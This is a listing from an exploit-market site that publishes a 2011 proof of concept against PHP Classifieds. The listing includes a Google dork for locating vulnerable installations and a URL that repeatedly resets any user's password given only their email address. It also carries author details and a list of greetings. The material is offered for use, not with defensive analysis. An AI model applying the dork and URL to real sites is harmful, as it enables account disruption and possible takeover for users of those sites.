[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Classifieds Remote User Reset Password Vulnerability

Author
Daniel Godoy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15694
Category
web applications
Date add
26-03-2011
Platform
php
# Exploit Title: PHP Classifieds Remote User Reset Password Vulnerability
# Google Dork: allintext: Welcome to PHP Classifieds
# Date: 23/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.deltascripts.com/phpclassifieds
# Tested on: Linux

[Comment]
Saludos a:
Hernan Jais, Alfonso Cuevas, Inyexion,
Login-Root, KikoArg, Ricota,
Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
Jordan,Animacco ,yojota, Pablin77, SPEED, Knet, Cereal,
MagnoBalt,l0ve, NetToxic,Gusan0r, Lucas Apa, Maxi Soler, Darioxhcx,r0dr1,y0u-know.
SIR <3
[POC]

If you know the email of any user can reset your password for an unlimited
visiting the following url
http://localhost/classifieds/index.php?p=login&email=[mail@victima.com]&forgot=Send+to+me



#  0day.today [2024-11-15]  #